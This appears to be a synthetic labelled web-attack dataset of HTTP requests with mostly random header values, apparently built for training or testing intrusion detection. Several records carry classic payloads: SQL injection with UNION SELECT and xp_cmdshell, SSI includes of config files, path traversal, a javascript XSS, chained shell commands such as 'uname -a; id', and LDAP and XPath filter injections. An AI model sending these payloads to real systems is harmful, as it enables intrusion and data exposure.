POST /a1ueUDcO6/sMo1Aff@GcSuP.cgi? HTTP/1.0
Content-Length: 248
Content-Language: agrtw,ac8gae
Content-Encoding: compress
Content-Location: http://nh3w.de/tTcaesba.bin
Content-MD5: YXJlbHJlaWJFbnVlZW9mcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Jul 06 14:15:41 UTC
Last-Modified: Fri, 20 Jan 06 04:12:01 GMT
Host: 95.230.209.205:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 168.241.203.79
Cookie: Dprocessing-instructionlJXthvdDj=cfju6eid1jh;liwedCea6=7640802;dHq=eqconnect7erttre@ 
Cookie2: $Version="131"
Date: Fri, 11 Feb 05 11:55:39 GMT
ETag: "J9oOxUDDW36cel@qM"
Expect: 100-continue
From: eddo4bhd@tahahlyhn9.org
If-Modified-Since: Sun, 12 Dec 04 09:36:24 UTC
If-Unmodified-Since: Fri, 22 Jul 05 11:02:15 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 12 Jul 06 23:25:34 UTC
Max-Forwards: 3153
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: stso6 ogso9=thaamu
Authorization: Digest uri=/unEi1at/na7irijs/csts.jsp
Referer: http://www.reooH.net/igutha/nnge7oC.jsp
TE: deflate
Trailer: Expect
User-Agent: Gdrqd/9.9.3.9
UA-CPU: x86
UA-Disp: 856,630,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 892x2342
Via: HTTP/2.4 www.4sogb3n.jpeg, HTTP/4.4 www.fosr.shtml, 9.5 210.16.219.54
Transfer-Encoding: gzip
Upgrade: uw1/6.2, gcsmod/3.8, exeh/4.6
Warning: 164 www.jIwGs.png "tHplR" 
X-Forwarded-For: 190.76.80.54
X-Serial-Number: 3513776009500054162
----: ---------------
~~~~~: ~~~~~~~~~~~~

Upd=66307116&0dN3.@Hobjecthzmstdin=39w&pO=ees4Ohndivoeu>hh&Sna=exec    xp_cmdshell    '"nreA"     >> script.vbs'&fcetey6rre1va=Yupdatee&3hoi0kxlgmrome=489&eOamvbwqirhrI6=u aasj6jettwhtaccesto&vt=c>ieg6d&5lwjq6RhNiryris=41cn0&a9I=Ses

End - Id: 41014
Start - Id: 41346
class: SqlInjection
GET /ex/hYBFjw0Qf4@Lii.cgi?mhoeabh93Ha0we=unionreahpista%3Fgo&mdih=RMr5c%2FltN&pupA88tqnlWe39e=mYXm&eolooHhsBafde=ef%3B&i9fKZdeaapg=cmmezeyeHter7rO&doupn=4851510&h.dpY3asock_streamYX=Hi&7t9he=9Etks1etUstyleeiyr&8riho=b2Jh-&W4Ysystem=taiwhnseeaTie1iaoo&pA6hr8taepK=t3o&R3having8P1f5=positioncopyt%7Csimw+aJurdCrcpqftpd&mdetttsOsh4n5=23 HTTP/1.1
Host: 14.198.126.54:80
Connection: nrg4r
Accept: image/jpeg;q=0.5, video/*
Accept-Charset: euc-jp, x-mac-cyrillic;q=0.8, iso-8859-7;q=0.4, us-ascii
Accept-Encoding: *
Accept-Language: tiEan6z-A, EapyhaP-6ditus, tLruUB-Tahgrri;q=0.2, eimrnaU-ttniegnl, tlfos62i-lFur;q=0.1
Cache-Control: no-transform
Client-ip: 179.60.122.186
Cookie: ioigipoi7sl=7762;J@4VAx=899290468;otwciecihohr='  )   UNION ALL SELECT  8330   FROM   n0nrney     WHERE     (   ''  =   '
Cookie2: $Version="66"
Date: Mon, 14 Jul 08 19:32:47 CET
If-None-Match: *
If-Range: Mon, 21 Apr 08 07:08:06 CET
Max-Forwards: 6607
Pragma: 8tr9eFc=a3e
Authorization: Basic b2JhUnBsRUE6dGN1bmw=
Referer: /a4oe.swf
Trailer: If-Modified-Since
User-Agent: Mozilla/4.8 (compatible; bIe9; Open BSD i386; xee1c0)
Via: Oyo6/2.4 96.184.137.221, ivsbic/9.5 142.133.119.213
Transfer-Encoding: compress
----: -------------------------------------------------

null

End - Id: 41346
Start - Id: 49719
class: XPathInjection
GET /iKA.YZtCA0l-2R/dN/4ojbteftdteOfU3O.png?4hoDtc=fkiWF2Te1iV&vPCD=qotf+7&ia28r6noxhf0=dar&eriirauw96mem2=6426729717&Upl3s=lfgFsiae%27+or++++%28i+++%3C+++count%281sdtee%2Fchild%3A%3Atext%28%29%29+and++++j+++++%3C+++count%28th%2Fchild%3A%3Acomment%28%29%29+++++and+k+++++%3C+++++count%28enh%2Fchild%3A%3A*%29++%29+or+++++%27wdb%27%3D+++%27+++++BLo5len%27+++or&n0esekqin8e7iSt=xis%3CE%3D1tnsAedi%3En8b HTTP/1.1
Host: 184.28.86.92:80
Connection: titd
Accept: */*
Accept-Charset: windows-1258, ks_c_5601-1987, x-mac-korean, windows-1255;q=0.1
Accept-Encoding: identity;q=0.6, deflate, deflate
Accept-Language: n4kt-lAt2h, aemPCG-3, h-sgtL0v;q=0.8, TeT-riAaATeo;q=0.5, irk-7dtz2zi
Cache-Control: r7pcnht=rjgcoe6
Client-ip: 108.36.71.41
Cookie: yut=e_@s.WGsu0t5
Cookie2: $Version="70"
Date: Mon, 29 Nov 04 12:59:32 UTC
ETag: "iITkPXqitf-bCHofqIg"
Expect: aeda40o1=roasef;lhishow=zioCeH
From: u5ln@onsTkmM.ch
If-Modified-Since: Wed, 08 Nov 06 06:31:54 CET
If-Unmodified-Since: Thu, 30 Mar 06 20:57:51 GMT
If-Match: "AgAf0R9MEar587QtrgoP"
If-None-Match: *
If-Range: "u3WFoXy8j-AIC6_"
Max-Forwards: 3
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: Digest uri=/hedrheik/adpmPk/e0tocuAk.gif
Range: -5,-8543,85-24971
Referer: /neos/datron/ey4d/sx4nidm.exe
TE: trailers
Trailer: User-Agent
User-Agent: eUnyNr
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: HTTP/6.5 254.107.139.51, FTP/1.2 www.tnae.jpg:20
Transfer-Encoding: identity
Upgrade: Hr0ss/7.8, oseam/8.9, h6x/4.2
Warning: 552 www.hlm4jou.html:4395 "Roae" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49719
Start - Id: 39113
class: LdapInjection
PUT /iinA9aJ3nefiwh0tNN/J@FALUJZORGug/tQf1c7Z04EBCv/hB1OyX95Be-q./bjy6cG@7PoE4Kf/st1wisohyoetcjiesosw/aoaY5p8knc6t/iGa@J8WqozMZ1/he50.png? HTTP/1.1
Content-Length: 200
Content-Language: o5,Aiarjaot,ytL
Content-Encoding: identity
Content-Location: /i6ec0/tccdts.tar.gz
Content-MD5: UnhlNnBvbjYxY3RvbmlzVg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Jan 08 15:36:03 UTC
Last-Modified: Wed, 16 Jan 08 24:00:24 GMT
Host: www.Tnawgeayw.com
Connection: rreth
Accept: */*;q=0.4
Accept-Charset: iso-8859-7, iso-8859-6;q=0.6, cp-950;q=0.9, iso-8859-8-i, x-mac-turkish
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 223.45.213.191
Cookie: iNryt=U9nilzev;eE=5;ie==e;ewz3yaattAtns=5dea2da4l;96Sscript1TSB=noett)(  |   (is=*);emko='a
Cookie2: $Version="67"
Date: Thu, 05 May 05 12:24:00 GMT
Expect: 100-continue
From: moUa@aWtec.biz
If-Modified-Since: Wed, 03 Jan 07 22:48:19 UTC
If-Unmodified-Since: Thu, 16 Sep 04 08:42:51 GMT
If-Match: "iX0LiIx.lArMJXxcd3"
If-None-Match: "KrqxOVLH9PmA_Wj"
If-Range: "GOaiNnR1LymUcmyFF"
Max-Forwards: 31
MIME-Version: 2.7
Pragma: uua16=4
Proxy-Authorization: eFDr4 tnpehf=6liout
Range: 47027-28,-23
Referer: http://ohfk.gov/Wrftxio/Iii2loir/edrsmt/nbelxss.php3
TE: gzip;q=0.0,deflate,gzip
User-Agent: 1odcihlIng/2.2.9.0.3
UA-Color: color16
UA-Pixels: 7722x806
Via: FTP/5.5 156.147.85.178, FTP/5.8 www.LmEiiCo.tiff, 0.5 www.4O2rfr.gif
Transfer-Encoding: compress
Upgrade: qh5sne/2.6, 4nbgo/3.9, dnda/5.1
Warning: 056 76.60.137.217 "ieEhigeezst" 
X-Serial-Number: 733492432548520
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

RVNO_=hbvugBce&oeetebtflawgiO=s.ro.&wso2qyPg0E=RecGpnaeub7rhnan&hanqasls1eaav=ycqse4eplggsedq&nwroiEv7uiEdf=a)ice&9mU@eXAaDwH=14871821&laetootae0whc=7924549&0otahnaS=917030&1Rft1rZ.=taehIpi~E0tS e

End - Id: 39113
Start - Id: 44645
class: PathTransversal
GET /yitrct/i6oV/tGqamHud5-/duotoataonors/sbh/39olif/mtlmLeQifaiC4snoe/dmbsmEC8/tuar/eP4M10PIs2eenJ9OX/d2oraehiastOas/ddess.mdb?scohriaysan=igRfsnR&HPopenx@S=4&efN=a1dWOSTP%40O9&tihiLNhoh=4053005&geihh=6089858&noheN9Agb=htoc&csruit=%26e%2Ba&hahtihSam2p=dVTM&ons6e1goeeHfaj=2790&4oes=Zi%5Dohomewsiyset&51gNtUnmadtoes=iu%25&isieaisoghbeeo=tlfrEe+&Mlibr8tZn=hYo&scy=0529 HTTP/1.0
Host: 152.208.236.230
Connection: close
Accept: */*
Accept-Charset: gb2312, x-mac-arabic, iso-8859-8
Accept-Encoding: ../../../inteil/admin.txt
Accept-Language: *
Cache-Control: min-fresh=81
Client-ip: 134.190.203.154
Cookie2: $Version="00"
Date: Sun, 19 Mar 06 09:21:07 GMT
ETag: W/"_VFS2wW67gDZE-6or_"
Expect: 100-continue
If-Modified-Since: Thu, 23 Oct 08 21:33:39 UTC
If-Unmodified-Since: Sat, 05 Nov 05 04:26:48 CET
If-None-Match: "forub@PlQyR4jY14ZV"
If-Range: Fri, 16 Jan 09 05:49:26 UTC
Max-Forwards: 98
Pragma: no-cache
Proxy-Authorization: cneski uhtR=teim
Referer: http://www.bfsewe.de/a74jaj/4c6S/rkjtA/osup/gsINhdnt.png
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/9.7 (Machintosh; U; PPC Mac OS X 7.8; ad-oe; rv:3.9.6) Gecko/99405072
UA-Disp: 099,001,16
Transfer-Encoding: cacN; qehu2=cwrne

null

End - Id: 44645
Start - Id: 42685
class: SqlInjection
POST /tIoyok4/iqbVdLaV1/uLjJHzi/16n.obclK/dcjHiA/pCXiHiNX-ioRy_Ax2Gsp/h7M2fy_5Vi7uM3@o8anL.mdb? HTTP/1.0
Content-Length: 140
Content-Language: onaz,aip94h,tmnOo
Content-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Host: 11.142.16.120
Connection: atrh0rh
Accept: video/*, video/*;q=0.9, text/*
Accept-Charset: x-mac-turkish, x-mac-arabic;q=0.0
Accept-Encoding: *
Accept-Language: ' union  select @@version,1,1,1--
Cache-Control: sanitcnt='lkeosjs'
Date: Wed, 21 Nov 07 07:01:10 GMT
Expect: 2rerajnn=llDcy0Nh
If-Modified-Since: Thu, 16 Dec 04 15:30:44 UTC
If-None-Match: "4TUr5ZZ2oVrjECKhztvO"
Max-Forwards: 7
Pragma: a2hjE=gC3l
Proxy-Authorization: Basic cnNodDp2Zmt5bQ==
Referer: http://www.tnecvets.biz/rore.mspx
User-Agent: tatzdeatvhpe
Via: HTTP/3.5 222.117.162.130, HTTP/4.5 115.176.29.208
Transfer-Encoding: identity
Upgrade: aungB/9.6, csrh/5.1, dowc/2.0, ascmsp/5.9, 6jHua/3.4

EegoaHnh=-$e S etcxRH&wSdnC@U=48&LreteneatLchphT=o@aobject&alteE7aTein=fa?otn=16trm&ohir=0ma&psbwenx=%Dn&stisicartae=pzeSiw3licnob

End - Id: 42685
Start - Id: 40472
class: SSI
GET /NZ/a1nanexgn8ieua/luehxuthtitt/ynpkLSfmgeehaoed/7aoyt1hqehrdp8/ooig89t/qViniow9roMait.css?5meohR4i=ecs&etbN6tielf=%3C%21--+++++%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22--%3E&rlatmr=anh+ HTTP/1.0
Host: 150.110.9.163
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 170.198.138.67
Cookie: 7poRla56si=88277634
Cookie2: $Version="386"
Date: Wed, 24 Feb 10 08:55:38 CET
ETag: "9HIuSgRtubV.qwABchz"
Expect: dnpeof=aR6EAn;vweQn
From: Yma7@5eefcOthto.biz
If-Modified-Since: Thu, 22 Jan 09 17:10:47 CET
If-Unmodified-Since: Mon, 25 Apr 05 21:29:03 CET
If-Match: "c04HdilrvQsbnHtdD"
If-None-Match: *
If-Range: *
Max-Forwards: 57
MIME-Version: 6.5
Pragma: s0='tsn'
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: Basic aGlpcGU6cENvTXlnaA==
Range: 6740-758,0802-
Referer: http://cne54nk.st/tmiag3/nmithtdc/iir9hotd.js
TE: gzip;q=0.1
Trailer: User-Agent
User-Agent: tensyensuu/0.2.6
UA-CPU: PowerPC
UA-Disp: 0480,927,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 025x185
Via: HTTP/1.4 209.216.196.220, 8.7 45.73.161.120:6, 8.0 www.ttvmro.css
Transfer-Encoding: identity
Upgrade: euiyir/6.1, hfa8er/9.8, bIRueh/1.1
Warning: 565 www.mo1i.jpg "difinztedvtd" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 98565372421828
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40472
Start - Id: 39829
class: SSI
GET /flmRvgehX/aHGh8D6-TOX9HNjP6P3/l@y7qyN/odwaewed4t.mdb?eri4xnaaes=2the&llrgr=0706&odoIo06ehgretu6=%3C%21--++++%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+--%3E&tLythevTseeo=101616&ioxc=26520 HTTP/1.1
Host: www.aiQeie.ch:77942
Connection: ys6ike
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: aaphccl-gs, 0bhlCEhh-etdst
Cache-Control: no-transform
Client-ip: 82.212.82.14
Cookie: eonoiy=hlrNhpieat;o8trnfnphJ=>~[wyr 0n;2ata=?l)y3;D_1v9KwfpositionnBU=oomtulwcIupdate scuage6e;cEo9nsUce=6
Date: Thu, 05 Mar 09 15:15:55 CET
Expect: 100-continue
If-Modified-Since: Sun, 20 Sep 09 13:58:52 UTC
If-None-Match: "JzlGIhn0gT3lm0Y@l"
Max-Forwards: 23
Pragma: no-cache
Authorization: Basic aWg4YTpkaThuNw==
Referer: /a5r7pmkh/tc7o.asmx
Trailer: Trailer
User-Agent: rsrOh0wsQyhdddyiT
UA-OS: Win9x
UA-Color: color16
Via: 4.1 www.aropr.css
Transfer-Encoding: nsOoSn; iurc5t=prrpae2l
X-Serial-Number: 46103258544750968619
----: ----------------

null

End - Id: 39829
Start - Id: 48033
class: XSS
GET /tHf6/tRpelnaeeoeneSizsAI/Oeteinnezbhy7tssTc/aKhAtinputh/cra8SNL2/3pM5/EgetEosn/formbshutdown5w8T0SR/tdjl2kbhhuossne.shtml?d0Ozi05yba22y=xcu8eq&qi56ulxe=ae&dunon=%3Cbgsound++++src++++%3D+++%22++++javascript%3A++%5Balert+++%28%276bajaa%27%29%3B%5D+%22+++%3E&o8toi=99615&OqZ5=2By_Ba&egbStd0=mteay&sa5saI1=ifQk39%40lYzjA&hsreibhC=tdNrincluderupdateD%40R4t20&xeLsoO5orlaCtt=SeY8doh&hybs3eoo=83649&rgeckecNetdhltw=0&9tEQDie_Uf-n=kwenae&oeiarmusou1=h+fhraceip&Lii=71183872 HTTP/1.0
Host: 188.104.104.176
Connection: keep-alive
Accept: */*
Accept-Charset: iso-10646-ucs-2, iso-8859-4, windows-1255;q=0.8, utf-8
Accept-Encoding: compress;q=0.8, compress;q=0.2, compress;q=0.1, identity
Accept-Language: eq-t6ssz;q=0.3, let1m3-ertgl, z-lMalr1r;q=0.1, 3ihNh-aEhmsw;q=0.0, apc-yAnaonst
Cache-Control: no-store
Client-ip: 98.157.200.107
Cookie: 2oseeanAai7elhu=t-8rB;eetyNsei=5;ntott3roa= e;h9glethT=79956859;kasjNN=aXNYU1DpHoFe;rfaeUta5wu=smeds90besndih
Cookie2: $Version="136"
Date: Fri, 01 Feb 08 11:47:14 CET
ETag: "RXIPZOoD.fV7rkbkIP4"
Expect: Sote=osmtMnst
From: uesois@ewrsoxtt.it
If-Modified-Since: Sat, 23 May 09 04:49:00 GMT
If-Unmodified-Since: Thu, 27 Oct 05 09:03:19 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Jan 09 07:48:38 CET
Max-Forwards: 8820
MIME-Version: 4.1
Pragma: crmrhia='dzNt'
Proxy-Authorization: Digest nc=DD143aEB
Authorization: Digest response="FAEfCADf616eD0Ba8AC58b324117Dcc8"
Range: -605,08388-217,461352-2
Referer: http://www.suAe.de/ptviu5pr/cseDh.mdb
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: vyia7/9.5.7.5
UA-CPU: PowerPC
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 717x263
Via: 1.7 71.35.142.28, 9tlea/8.8 www.fluilt.tiff
Transfer-Encoding: gzip
Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 698729021
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48033
Start - Id: 43428
class: OsCommanding
GET /eeae/21wsjodrop5rF/IeS6oruhroEeIeeg/tS6Qge5eetsccFD/aahByc/os4bgd7h6a7asuenaN/rolEqtWu/aaa/enI7E-KGbCqIXi.gif?S4jue1Noqnwice=9909&ntrSNsetijtdgN=+++++%3B+echo+++++%3B+++w+++++%3B+uname+++++-a++++%3B+++++id&meta5hPA.g=903980&cirs=60312&oteowttosdtd=348702052 HTTP/1.1
Host: www.artp.be
Connection: iwatts
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.2, iso-8859-5
Accept-Encoding: gzip;q=0.7, gzip;q=0.0, identity, compress
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 246.12.118.110
Cookie: emnsmi=titIaseaos;ehsmr=jccicdo2gh6eswlw;Sn=1ef9feoPm;sogahiaphr=sst h;qcinsertie6b=771
Cookie2: $Version="368"
Date: Sat, 13 Mar 04 01:56:04 GMT
ETag: W/"2-YlGqZjH4fQ5a8GuX_0"
Expect: nrxp
From: satt@ee2io.st
If-Modified-Since: Sat, 21 Feb 04 02:06:54 GMT
If-Unmodified-Since: Tue, 24 Feb 04 08:41:28 UTC
If-Match: *
If-None-Match: "@hkRObiO4mRb77d6"
If-Range: *
Max-Forwards: 39
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM dDJvZWVyaElzaXJjaDllZW9vbHdxYXR0a2tucmExbmNhaW5kYVJl
Authorization: NTLM c3JlbGR0NG56b3J0aW9sZWtldGFzemlvaG9hb3lmZmVldG5M
Range: 5130-,89497-47998,93-50140
Referer: http://0ngcdh.st/zelm1.js
TE: deflate,trailers
Trailer: If-Range
User-Agent: hjqfGS45 http://www.nhoYar.fr
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 319x516
Via: lzag0/5.8 184.189.52.164, 9.0 239.86.140.4
Transfer-Encoding: xbtr; eehsf=X64Ipldh
Upgrade: Oed/2.9
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 15.27.14.91
X-Serial-Number: 208175776515023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43428
Start - Id: 42207
class: SqlInjection
GET /yZ8r.1wd_sEG5Ab.asp?wdei5js7=%27++++UNION+++++++ALL++++++++++++SELECT++ereaf++++FROM+++++wd1s2famnt++++WHERE++%27%27++++%3D++++%27&il=5973&ihi=s320art%28insert%7CHdHe&rno=Hgroup+by%5Daq&hnygssab9sbhre=%40asrtmpsock_stream%25ge&le7=%7E++%26-faohpuniona79oHc%26o&VupdateXcatIincludemuU=Ottxsh&HHEUq3YD=dhuCu%3CPcoyunperl HTTP/1.1
Host: www.tcwgn.gov:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.2, windows-1257;q=0.5, x-mac-japanese, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 22.67.176.102
Cookie: aBnt=c7G;reeougA=283;5l@QgB2dKh=2;ZCA0=$rD;s3kijEtlincdsl9=3772190773
Cookie2: $Version="83"
Date: Sat, 24 Jan 04 15:54:50 CET
ETag: "08QcJQ-@nCVHGD-jk@-M"
Expect: 100-continue
From: bp6teizi@aeuaCwa.uk
If-Modified-Since: Thu, 21 Jul 05 02:24:56 GMT
If-Unmodified-Since: Tue, 20 Sep 05 18:30:43 UTC
If-Match: "-AYkDfPTiqoR_X@7o"
If-None-Match: *
If-Range: "_h1KHJSxLwaeJm-ZMRm"
Max-Forwards: 62
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM ZE5lVG9hbGlzZWw1ZGh4b3RxYXlvZHRyMHRxZWl3bGNObmg=
Authorization: tohms oro1h=3Duzsaa
Range: 8473-303,-227666,770360-
Referer: http://www.oEtaos.biz/ydCwn/sswNt/Va5n/Ye9ld/ezseih.sh
TE: chunked;q=0.2,chunked;q=0.2,trailers
Trailer: Warning
User-Agent: Mozilla/0.8 (compatible; MSIE 8.5; Win 9x; je2FoetomM; ziad; jsi9paMfo)
UA-CPU: StrongARM
UA-Disp: 764,0830,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 451x3766
Via: 4.6 151.62.141.211, 5.2 234.231.155.225:769, 4.2 www.v3tn.gif:889
Transfer-Encoding: gzip
Upgrade: srir/8.4
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 11545231207
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42207
Start - Id: 42091
class: SqlInjection
GET /eI6/rerliiotjwkhm/linkIimgM.js?eeryesk0sbov=obi76%5Daudr0nph-ai&ulmsntz=a1nhCA1S_&wtdmw1nheysttaa=oIB7NPOo&a1ttsjc=5A8d&gr8pipaiT5rug=lydSG.Ot0b&Qd@ncatiSEKL=aardRtMnerip&daevla=a8irT7cr%2BeiN%3D0lu&rnulliz5R9oOlunion=%27+OR+++++%27tlfttcta%27++BETWEEN+++++%27R%27+++AND+++++%27T HTTP/1.1
Host: www.6rmMuoednl.net
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman;q=0.1, iso-8859-4, utf-7, koi8-r, koi8-r
Accept-Encoding: *
Accept-Language: cedr-ldeee;q=0.1, hhg-l4ac;q=0.7
Cache-Control: no-cache
Client-ip: 141.233.175.105
Cookie: ihgrHadeo=vdao9dnRli9;otrgrd=lMboot.ini;hkuoimU=3EFY_GeR;hqs=iaErp;iwdhfIae=08;eeNggepc=3265547
Cookie2: $Version="940"
Date: Tue, 24 Mar 09 05:37:30 UTC
ETag: "EWRt_zJA_S@SSc6R5j"
Expect: bu7dtjr
From: ddasr9@itapbhhal.com
If-Modified-Since: Fri, 13 May 05 05:31:51 CET
If-Unmodified-Since: Wed, 22 Apr 09 13:59:03 UTC
If-Match: "__O3SF7HBl9NEex_u6r8"
If-None-Match: *
If-Range: "h4r7QSDOTjrx5E0g3M"
Max-Forwards: 34
MIME-Version: 0.9
Pragma: c6umIee='tccpa'
Proxy-Authorization: NTLM VGFlZHBlN3lzdDM4RWV0aWJsaGlhYWJoc2ZvdFd1aWVTZWxi
Authorization: Digest algorithm=roOs
Range: 106-1944,67279-,2-
Referer: http://www.atn7pevt.fr/fkax/4zafshet/9or1qrWe/Y0es/smOptau0.gif
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/0.8 (Windows; U; Windows NT 3.2; ac-a0; rv:7.7.3) Gecko/56833493
UA-CPU: Sparc
UA-Disp: 7402,9004,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4728x9077
Via: 6.6 17.200.7.34, 70v/6.3 www.s74htkqe.jpg, 4.7 220.159.212.171
Transfer-Encoding: compress
Upgrade: z6NS/9.8, Brl/1.0, ets/2.0
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42091
Start - Id: 45793
class: PathTransversal
GET /e6F18NEooRh95Wv/urw2APt-HaCZ0UG3Fb/vXUVnQRK9jf0G/eb.QQ4mL0d0KTHw6N/4between3mmetaE3iwinnt_/I@ky.drop3fwS1/6@KaDfSm/cJKcPz5/.7WIH/SocVbetweentmp4i3YNB.htm?tU8yGaotee=0&nlat5e=%5CWINDOWS%5Csystem.ini&f-mM@OZ=i1nlEls&O83vqghhlaM=mein70a33&Ditqlhaheto=shutdownusdyaNtfqp%27b8n&8eLconnect=inhnc+&nPufaieuqat=2&taaetlsqe=im%27%295phptelnet&mmlynrqcsofhn=ers+d%2Fhlshend&npcenisc=sologynmnoE4%25 HTTP/1.1
Host: 246.42.69.56
Connection: rib7wot
Accept: */*;q=0.1
Accept-Charset: big5, windows-1250, euc-tw;q=0.1, x-mac-turkish;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: aeei-ne;q=0.7, TfNevrei-Elai;q=0.3, dcck-A2UnnIa8;q=0.2
Cache-Control: no-store
Client-ip: 40.147.120.92
Cookie: ajndtWxs9Ojngny= Seren-rFNda;JG2j=eeeywuTib;rlte41y=Ju0
Cookie2: $Version="08"
Date: Fri, 16 Apr 04 04:56:28 CET
ETag: "1UYXYoyn1ISOZ-ytTEbk"
Expect: 100-continue
From: tehZutuc@dllzd.uk
If-Modified-Since: Wed, 19 Jul 06 24:34:04 GMT
If-Unmodified-Since: Thu, 22 Apr 04 15:12:32 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Oct 04 04:01:46 GMT
Max-Forwards: 41
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: attk esmu5=OSiF3tt
Authorization: Basic Z3BMb2ljOjZ0ZWdNaw==
Range: 855-
Referer: http://www.Y7ocs.ch/dsre/MrShkp/yeaem1.jpg
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.8 (X11; U; Open BSD i586 5.7; rx-de; rv:5.1.5) Gecko/62512420
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9422x259
Via: 5.1 www.inmilnhc.jpeg
Transfer-Encoding: compress
Upgrade: F3awa4/4.3, 9rim7/0.4, reilie/2.8, 3il/4.5, Stse/6.1
Warning: 610 192.1.135.3:2396 "ysstaeiltotrenks" "Sun, 26 Mar 06 18:59:14 UTC"
X-Forwarded-For: 110.58.93.193
X-Serial-Number: 06918680418533
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45793
Start - Id: 37120
class: LdapInjection
GET /2eeunNsi/yallbytct/Vt7/l__p0vbscripttkYhtpass7liketkE/NFu957-K_0Bq/IbinL%ukHjb53AkHzJ/g-dvgZpmYuhSxAyi/UrFbOUconnectxexec/N7Kis/94YBCg.php?ce=nVutlZE%40q.u&fJ63qxVrj=heetc%3Dat+Phdo6ej&geda=iHA2mfmpuv&nosrruErmeKip=a8esQi2s4isLs&wkbvriframeCv=833542&umattotEeaud7f=%29+++%28++%7C+++%28+++cn%3D*o%27brien*++++%29%28mail%3D*o+++%27brien*+++%29&tt1fAWaln2Fsq=237&deSEhzieagPtLq2=eehhtpasst&idasglae63imoE=swxeutlaadarPbs&dneenitaiOu=O%29Eg%5B%3Ela5n+RnEeauu5o&ZO2wc=soebinrllt HTTP/1.1
Host: www.tetaRut.uk:81702
Connection: ihi2izht
Accept: text/xml
Accept-Charset: *
Accept-Encoding: identity, identity
Accept-Language: 5ias4-womB
Cache-Control: pjtfi=o
Client-ip: 55.97.57.216
Cookie: q484DL=qiajdsIydto&mh;eiNxohr7TrnlCl=23;rFUroosgt8=erzaagr4ohuyR;tnidOirUrAtwys=rEIpF
Cookie2: $Version="74"
Date: Mon, 04 Aug 08 02:38:04 CET
ETag: "TmD0qTaJ19HIJ8S"
Expect: 100-continue
From: ke6iat@otEmem.org
If-Modified-Since: Fri, 21 Mar 08 20:24:41 GMT
If-Unmodified-Since: Tue, 17 Aug 04 03:13:44 GMT
If-Match: "ERNyZeAE62yHcTnzMakT"
If-None-Match: *
If-Range: "bthC@e0eZ2O04DKXg"
Max-Forwards: 0617
MIME-Version: 6.7
Pragma: no-cache
